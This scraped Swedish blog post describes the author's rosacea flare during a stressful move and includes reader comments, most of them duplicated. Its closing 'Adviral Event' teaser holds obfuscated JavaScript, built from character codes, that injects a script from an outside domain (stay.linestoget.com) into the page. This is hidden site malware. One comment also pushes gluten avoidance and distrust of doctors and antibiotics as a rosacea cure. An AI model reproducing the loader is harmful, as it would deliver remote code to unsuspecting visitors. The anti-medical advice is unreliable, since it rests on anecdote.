Rosacea attack igen! (Jobbigt) ärliga bilder…

OLYMPUS DIGITAL CAMERA

Hemma hos mitt ❤️

Det första Lilleman säger när jag kommer till skolan:

”Mamma! Jag vill åka till Stockholm, kan vi åka till Jonas nu?”  Jösses😅 Jag hade preciiiis kört nån-stopp från Sthlm 🙈

Ludvig ringde FaceTime till Jonas i bilen Påvägen hem… ☺️ Dom har verkligen får en fin relation. 

Vi skyndade oss hem till katterna… Stina & Sture har haft kattvakt 🙏🏻 Som lämnat massa roliga leksaker 🙌🏻 Tack fina du!

BE7C73F3-F848-4C80-A5C4-18090558C7ED

OLYMPUS DIGITAL CAMERA

 

OLYMPUS DIGITAL CAMERA

Sture ser helt slut ut?! Trött kille helt enkelt….. Sötnöt!

Imorse innan jag lämnade huvudstaden så mötte jag upp Bobby för en frulle. Innan jag skulle till ”ångest-doktorn”. Espressohouse fick det bli. Frukt och nötscones är ju bara SÅ gott! 😍 Det kan jag inte äta FÖR ofta dock… 

OLYMPUS DIGITAL CAMERA

Rosacea helvetet!

Som vanligt när det är stressigt och jag inte mår på topp så slår den till! Som ett brev på posten!

Just nu är det nog kombinationen av att stå inför flytt, samtidigt som renoveringen ska ”klaffa”. Sömnen har spökat, lite stressad över logistiken närmaste månaden… Mycket plugg, många roliga saker på G. Men en j*vligt intensiv månad! 

Ja, då blir det såhär! Svider gör det också! 

0F0DADC0-0E63-40AA-84BD-3F47D66450A9

Roscasean blir jag ju aldrig av med… Den ligger ju latent hela tiden. Men sedan i midsommar. ( se inlägg HÄR ) så har det varit okay. Nästan inte märkt av den alls.. 

 Oftast (peppar peppar) så håller jag den i schakt. Med hjälp av anpassade produkter, ”clean” mat, och antibiotika i perioder. Men nähä! Då var det dags för en omgång igen!!! Förr så hade jag ”gömt” mig, lagt upp gamla bilder och försökt att helt dölja det….

Men är det någonting jag är trött på så är det just den ”låtsas” värld som jag dagligen möter på sociala medier😝

Privat och som influenser.

Majoriteten försöker ge ett sken av den ”perfekta” vardagen, den lyckligaste familjen, med det ”perfekta livet” osv…

Jag säger INTE att alla gör det, men majoriteten.

Jag väljer att slå ett slag för mer ärlighet och ställer mig tillsamman alla dom som, precis som jag står för hur det verkligen är.

-I med och motgång!

Om du som jag har Rosacean så vet du hur det kan kännas. Förr så påverkade det mitt självförtroende och jag mådde riktigt, riktigt dåligt!

-Inte längre….

jag tycker såklart inte att det är kul 😂 Men jag skäms inte, jag mår inte dåligt på samma sätt! Jag GÖMMER MIG INTE!

Hoppas att du som lever med samma jobbiga  hudsjukdom som jag, också kan distansera dig till den, och ändå känna att du är fin precis som du är🌟

både med och utan rosacea 🙏🏻❤️

kram på dig!

 /My Martens  Ps:

här ser du Gammla bilder på hur det hat sett ut 

96822195-DB77-4D41-969F-3B42E7888E8D 5F4A36C2-168D-4359-9782-02D163CA884B

 

 

 

49 Komentarer

 1. Du skulle försöka ta det lite lugnare ditt liv kör oftast i
  300 km/h och alltid så mycket olika saker på gång. Förstår att det kan bli så ibland och svårt att säga nej men tycker att du borde göra det för din egen skull.

  • Jag heter ju inte My ?
   Men……. Sarah ,tror du inte det svaret kommer när det kommer?
   Eller tänkte du/ni som undrar boka in flyttstädning och flyttlastbil? Och ta semester i värsta fall? så ni kan hjälpa till eller? ?
   Hoppas du mår bättre sen My, ser lite ont ut… Å skönt kan jag tänka mig att inte bo i byggdamm ? ♥♥

 2. Du skulle försöka ta det lite lugnare ditt liv kör oftast i
  300 km/h och alltid så mycket olika saker på gång. Förstår att det kan bli så ibland och svårt att säga nej men tycker att du borde göra det för din egen skull.

  • Jag heter ju inte My 😉
   Men……. Sarah ,tror du inte det svaret kommer när det kommer?
   Eller tänkte du/ni som undrar boka in flyttstädning och flyttlastbil? Och ta semester i värsta fall? så ni kan hjälpa till eller? 😉

   Hoppas du mår bättre sen My, ser lite ont ut… Å skönt kan jag tänka mig att inte bo i byggdamm 😉 ♥♥

 3. Fina My. ? du är fin ändå både på utsidan och insidan med eller utan utslag. Ta hand om dig och din lille vapendragare ? ? kram Sara ?

 4. Fina My. 😘 du är fin ändå både på utsidan och insidan med eller utan utslag. Ta hand om dig och din lille vapendragare 😘 💕 kram Sara 💕

 5. Min man hade det var så jobbigt vet jag att han tyckte det han kunde inte äta apelsiner för då blommade upp så jag vet hur jobbigt det är du har det kramisar ??

 6. Hej ?
  Ett tips om hjälp mot rosacea. Skippa allt med gluten. Jag blev av med rosacea när jag skippade det. Flera av mina vänner har fått samma resultat.
  Jag vet att det kan vara känsligt att ge råd som handlar om kost, men mitt råd är i all välmening. Vh Bea

 7. Min man hade det var så jobbigt vet jag att han tyckte det han kunde inte äta apelsiner för då blommade upp så jag vet hur jobbigt det är du har det kramisar 💖😀

 8. Hej 🙂
  Ett tips om hjälp mot rosacea. Skippa allt med gluten. Jag blev av med rosacea när jag skippade det. Flera av mina vänner har fått samma resultat.
  Jag vet att det kan vara känsligt att ge råd som handlar om kost, men mitt råd är i all välmening. Vh Bea

 9. Hej My! Åh vad jobbigt – min mamma har det också men hennes blir inte såriga, bara röda prickar som kliar JÄTTEmycket. Är du säker att det inte är herpes? Du har väl/förmodligen varit hos läkare och second opinion? Men OM det inte är rosacea så finns det ju annan broms/dämpande medicin (tror jag, herpes är ett virus?) som kanske kan hjälpa dig. Men det har du kanske kollat upp, bara en idé. Lycka till med allt, läser din blogg varje dag – när du skriver allt du ska göra osv. så get det mig jätte-pepp i mitt eget stressiga liv. Det är jättemycket värt!

  • Hej Cecilia! Ja, jag vet att det är roscacea. Jag har haft det i många år nu… jag får alltid sår. Men medicinen hjälper. Så snart är det borta igen ?

 10. Hej My! Åh vad jobbigt – min mamma har det också men hennes blir inte såriga, bara röda prickar som kliar JÄTTEmycket. Är du säker att det inte är herpes? Du har väl/förmodligen varit hos läkare och second opinion? Men OM det inte är rosacea så finns det ju annan broms/dämpande medicin (tror jag, herpes är ett virus?) som kanske kan hjälpa dig. Men det har du kanske kollat upp, bara en idé. Lycka till med allt, läser din blogg varje dag – när du skriver allt du ska göra osv. så get det mig jätte-pepp i mitt eget stressiga liv. Det är jättemycket värt!

  • Hej Cecilia! Ja, jag vet att det är roscacea. Jag har haft det i många år nu… jag får alltid sår. Men medicinen hjälper. Så snart är det borta igen 😄

 11. Förstår dig, har själv haft problem med perioral dermatit och när det var som värst fick jag bara ha vanligt vatten i ansiktet, ingenting annat. Det var så jobbigt men jag köpte en svindyr plattång och tänkte att jag kan i alla fall var fin i håret. Hjälpte liiite…Hoppas du känner dig bättre snart!

 12. Förstår dig, har själv haft problem med perioral dermatit och när det var som värst fick jag bara ha vanligt vatten i ansiktet, ingenting annat. Det var så jobbigt men jag köpte en svindyr plattång och tänkte att jag kan i alla fall var fin i håret. Hjälpte liiite…Hoppas du känner dig bättre snart!

 13. Min rosacea försvann och jag har aldrig använt antibiotika det lurar kroppen för stunden bättre att hitta det som funkar på lång sikt och ta reda på hur man ska sköta sin kropp för att inte få problem..sen jag började med Exuviance har jag blomstrat tog ett bra tag innan det blev bra ??Jag är lite anti läkarnas metoder ibland (endast det vetenskapliga duger åt dem de kan aldrig tänka utanför boxen)det är som när jag hade astma blev fullproppad med kortison i alla år men så slutade jag med gluten som ger inflammationer i kroppen och har inte använt medicin en enda gång HAPPY girl, samma med rosacea gluten/socker/mjölkprodukter är inte bra men jag fuskar med allt utom gluten?alkohol och fel makeup not good..jag använder bara mineralsmink (Sheercover) hoppas du blir bättre fort..

 14. Min rosacea försvann och jag har aldrig använt antibiotika det lurar kroppen för stunden bättre att hitta det som funkar på lång sikt och ta reda på hur man ska sköta sin kropp för att inte få problem..sen jag började med Exuviance har jag blomstrat tog ett bra tag innan det blev bra 👍🏻Jag är lite anti läkarnas metoder ibland (endast det vetenskapliga duger åt dem de kan aldrig tänka utanför boxen)det är som när jag hade astma blev fullproppad med kortison i alla år men så slutade jag med gluten som ger inflammationer i kroppen och har inte använt medicin en enda gång HAPPY girl, samma med rosacea gluten/socker/mjölkprodukter är inte bra men jag fuskar med allt utom gluten😝alkohol och fel makeup not good..jag använder bara mineralsmink (Sheercover) hoppas du blir bättre fort..

 15. Usch starkas dig! Du måste försöka stressa ner lite! Beundrar dig som orkar med allt det som du just nu står i!!
  Kan du inte ta hjälp av flyttfirmor/städfirmor? Vet att det är dyrt men tänker på att du kör fram och tillbaka till Stockholm som galning det kostar oxå en massa pengar! Åk ner märk alla möbler saker som ska till dem olika ställen och låt flyttfirmorna packa/flytta och städfirman städa.
  Hade jag varit du hade jag försökt sälja av en hel del och köpt nytt efterhand istället.
  Som du skrev att du ville helst börja om och rensa ut. Man måste göra det direkt för annars blir det aldrig av. (Man blir lätt hemmablind.) Då är det trehundra andra saker som ska göras.
  Lycka till nu och glöm inge ta hjälp utav vänner!!

 16. Usch starkas dig! Du måste försöka stressa ner lite! Beundrar dig som orkar med allt det som du just nu står i!!

  Kan du inte ta hjälp av flyttfirmor/städfirmor? Vet att det är dyrt men tänker på att du kör fram och tillbaka till Stockholm som galning det kostar oxå en massa pengar! Åk ner märk alla möbler saker som ska till dem olika ställen och låt flyttfirmorna packa/flytta och städfirman städa.

  Hade jag varit du hade jag försökt sälja av en hel del och köpt nytt efterhand istället.
  Som du skrev att du ville helst börja om och rensa ut. Man måste göra det direkt för annars blir det aldrig av. (Man blir lätt hemmablind.) Då är det trehundra andra saker som ska göras.

  Lycka till nu och glöm inge ta hjälp utav vänner!!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/